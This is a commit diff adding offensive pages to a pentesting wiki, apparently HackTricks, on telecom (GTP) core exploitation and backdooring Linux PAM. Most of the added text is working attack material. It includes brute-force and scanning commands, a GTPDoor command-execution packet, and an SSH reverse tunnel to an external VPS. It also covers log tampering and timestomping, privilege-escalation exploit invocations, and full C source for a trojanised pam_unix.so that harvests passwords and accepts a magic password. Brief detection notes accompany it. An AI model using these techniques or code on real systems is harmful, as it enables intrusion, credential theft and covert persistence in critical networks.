Add content from: The Covert Operator's Playbook: Infiltration of Global Telec...

2025-10-10 18:36:50 +00:00 · 2025-07-30 01:39:09 +00:00 · 2025-07-30 01:39:09 +00:00 · e4cc515e35
commit e4cc515e35
parent 18b2e7f2c0
4 changed files with 223 additions and 0 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -21,6 +21,7 @@
  - [Network Protocols Explained (ESP)](generic-methodologies-and-resources/pentesting-network/network-protocols-explained-esp.md)
  - [Nmap Summary (ESP)](generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md)
  - [Pentesting IPv6](generic-methodologies-and-resources/pentesting-network/pentesting-ipv6.md)
  - [Telecom Network Exploitation](generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md)
  - [WebRTC DoS](generic-methodologies-and-resources/pentesting-network/webrtc-dos.md)
  - [Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks](generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
  - [Spoofing SSDP and UPnP Devices with EvilSSDP](generic-methodologies-and-resources/pentesting-network/spoofing-ssdp-and-upnp-devices.md)
--- a/src/generic-methodologies-and-resources/pentesting-network/README.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/README.md
@ -890,6 +890,13 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
 Bettercap broadcast WSD packets searching for services (UDP Port 3702).
 ### Telecom / Mobile-Core (GTP) Exploitation
 {{#ref}}
 telecom-network-exploitation.md
 {{#endref}}
 ## References
 - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
--- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
+++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md
@ -0,0 +1,157 @@
 # Telecom Network Exploitation (GTP / Roaming Environments)
 {{#include ../../banners/hacktricks-training.md}}
 > [!NOTE]
 > Mobile-core protocols (GPRS Tunnelling Protocol – GTP) often traverse semi-trusted GRX/IPX roaming backbones.  Because they ride on plain UDP with almost no authentication, **any foothold inside a telecom perimeter can usually reach core signalling planes directly**.  The following notes collect offensive tricks observed in the wild against SGSN/GGSN, PGW/SGW and other EPC nodes.
 ## 1. Recon & Initial Access
 ### 1.1  Default OSS / NE Accounts
 A surprisingly large set of vendor network elements ship with hard-coded SSH/Telnet users such as `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, …  A dedicated wordlist dramatically increases brute-force success:
 ```bash
 hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt
 ```
 If the device exposes only a management VRF, pivot through a jump host first (see section «SGSN Emu Tunnel» below).
 ### 1.2  Host Discovery inside GRX/IPX
 Most GRX operators still allow **ICMP echo** across the backbone.  Combine `masscan` with the built-in `gtpv1` UDP probes to quickly map GTP-C listeners:
 ```bash
 masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55
 ```
 ## 2. Enumerating Subscribers – `cordscan`
 The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses.  Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscriber’s visited PLMN.
 ```bash
 # Build
 GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan
 # Usage (typical):
 ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap
 ```
 Key flags:
 - `--imsi` Target subscriber IMSI
 - `--oper` Home / HNI (MCC+MNC)
 - `-w`      Write raw packets to pcap
 Important constants inside the binary can be patched to widen scans:
 ```
 pingtimeout       = 3   // seconds before giving up
 pco               = 0x218080
 common_tcp_ports  = "22,23,80,443,8080"
 ```
 ## 3. Code Execution over GTP – `GTPDoor`
 `GTPDoor` is a tiny ELF service that **binds UDP 2123 and parses every incoming GTP-C packet**.  When the payload starts with a pre-shared tag, the remainder is decrypted (AES-128-CBC) and executed via `/bin/sh -c`.  The stdout/stderr are exfiltrated inside **Echo Response** messages so that no outward session is ever created.
 Minimal PoC packet (Python):
 ```python
 import gtpc, Crypto.Cipher.AES as AES
 key = b"SixteenByteKey!"
 cmd = b"id;uname -a"
 enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00"))
 print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc))
 ```
 Detection:
 * any host sending **unbalanced Echo Requests** to SGSN IPs
 * GTP version flag set to 1 while message type = 1 (Echo) – deviation from spec
 ## 4. Pivoting Through the Core
 ### 4.1  `sgsnemu` + SOCKS5
 `OsmoGGSN` ships an SGSN emulator able to **establish a PDP context towards a real GGSN/PGW**.  Once negotiated, Linux receives a new `tun0` interface reachable from the roaming peer.
 ```bash
 sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \
       -APN internet -c 1 -d
 ip route add 172.16.0.0/12 dev tun0
 microsocks -p 1080 &   # internal SOCKS proxy
 ```
 With proper firewall hair-pinning, this tunnel bypasses signalling-only VLANs and lands you directly in the **data plane**.
 ### 4.2  SSH Reverse Tunnel over Port 53
 DNS is almost always open in roaming infrastructures.  Expose an internal SSH service to your VPS listening on :53 and return later from home:
 ```bash
 ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com
 ```
 Check that `GatewayPorts yes` is enabled on the VPS.
 ## 5. Covert Channels
 | Channel | Transport | Decoding | Notes |
 |---------|-----------|----------|-------|
 | ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | pure passive listener, no outbound traffic |
 | DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | watches for `*.nodep` sub-domain |
 | GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | blends with legitimate GTP-C chatter |
 All implants implement watchdogs that **timestomp** their binaries and re-spawn if crashed.
 ## 6. Defense Evasion Cheatsheet
 ```bash
 # Remove attacker IPs from wtmp
 utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp
 # Disable bash history
 export HISTFILE=/dev/null
 # Masquerade as kernel thread
 echo 0 > /proc/$$/autogroup   # hide from top/htop
 printf '\0' > /proc/$$/comm    # appears as [kworker/1]
 touch -r /usr/bin/time /usr/bin/chargen   # timestomp
 setenforce 0                              # disable SELinux
 ```
 ## 7. Privilege Escalation on Legacy NE
 ```bash
 # DirtyCow – CVE-2016-5195
 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd
 # PwnKit – CVE-2021-4034
 python3 PwnKit.py
 # Sudo Baron Samedit – CVE-2021-3156
 python3 exploit_userspec.py
 ```
 Clean-up tip:
 ```bash
 userdel firefart 2>/dev/null
 rm -f /tmp/sh ; history -c
 ```
 ## 8. Tool Box
 * `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – custom tooling described in previous sections.
 * `FScan` : intranet TCP sweeps (`fscan -p 22,80,443 10.0.0.0/24`)
 * `Responder` : LLMNR/NBT-NS rogue WPAD
 * `Microsocks` + `ProxyChains` : lightweight SOCKS5 pivoting
 * `FRP` (≥0.37) : NAT traversal / asset bridging
 ---
 ## Detection Ideas
 1. **Any device other than an SGSN/GGSN establishing Create PDP Context Requests**.
 2. **Non-standard ports (53, 80, 443) receiving SSH handshakes** from internal IPs.
 3. **Frequent Echo Requests without corresponding Echo Responses** – might indicate GTPDoor beacons.
 4. **High rate of ICMP echo-reply traffic with large, non-zero identifier/sequence fields**.
 ## References
 - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
 - 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0)
 - 3GPP TS 29.281 – GTPv2-C (v17.6.0)
 {{#include ../../banners/hacktricks-training.md}}
--- a/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
+++ b/src/linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md
@ -48,9 +48,67 @@ Controls dictate the module's response to success or failure, influencing the ov
 In a setup with multiple auth modules, the process follows a strict order. If the `pam_securetty` module finds the login terminal unauthorized, root logins are blocked, yet all modules are still processed due to its "required" status. The `pam_env` sets environment variables, potentially aiding in user experience. The `pam_ldap` and `pam_unix` modules work together to authenticate the user, with `pam_unix` attempting to use a previously supplied password, enhancing efficiency and flexibility in authentication methods.
 ## Backdooring PAM – Hooking `pam_unix.so`
 A classic persistence trick in high-value Linux environments is to **swap the legitimate PAM library with a trojanised drop-in**.  Because every SSH / console login ends up calling `pam_unix.so:pam_sm_authenticate()`, a few lines of C are enough to capture credentials or implement a *magic* password bypass.
 ### Compilation Cheatsheet
 ```c
 #define _GNU_SOURCE
 #include <security/pam_modules.h>
 #include <dlfcn.h>
 #include <stdio.h>
 #include <fcntl.h>
 #include <unistd.h>
 static int (*orig)(pam_handle_t *, int, int, const char **);
 static const char *MAGIC = "Sup3rS3cret!";
 int pam_sm_authenticate(pam_handle_t *pamh, int flags, int argc, const char **argv) {
    const char *user, *pass;
    pam_get_user(pamh, &user, NULL);
    pam_get_authtok(pamh, PAM_AUTHTOK, &pass, NULL);
    /* Magic pwd → immediate success */
    if(pass && strcmp(pass, MAGIC) == 0) return PAM_SUCCESS;
    /* Credential harvesting */
    int fd = open("/usr/bin/.dbus.log", O_WRONLY|O_APPEND|O_CREAT, 0600);
    dprintf(fd, "%s:%s\n", user, pass);
    close(fd);
    /* Fall back to original function */
    if(!orig) {
        orig = dlsym(RTLD_NEXT, "pam_sm_authenticate");
    }
    return orig(pamh, flags, argc, argv);
 }
 ```
 Compile and stealth-replace:
 ```bash
 gcc -fPIC -shared -o pam_unix.so trojan_pam.c -ldl -lpam
 mv /lib/security/pam_unix.so /lib/security/pam_unix.so.bak
 mv pam_unix.so /lib/security/pam_unix.so
 chmod 644 /lib/security/pam_unix.so     # keep original perms
 touch -r /bin/ls /lib/security/pam_unix.so  # timestomp
 ```
 ### OpSec Tips
 1. **Atomic overwrite** – write to a temp file and `mv` into place to avoid half-written libraries that would lock out SSH.
 2. Log file placement such as `/usr/bin/.dbus.log` blends with legitimate desktop artefacts.
 3. Keep symbol exports identical (`pam_sm_setcred`, etc.) to avoid PAM mis-behaviour.
 ### Detection
 * Compare MD5/SHA256 of `pam_unix.so` against distro package.
 * Check for world-writable or unusual ownership under `/lib/security/`.
 * `auditd` rule: `-w /lib/security/pam_unix.so -p wa -k pam-backdoor`.
 ### References
 - [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
 - [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/)
 {{#include ../../banners/hacktricks-training.md}}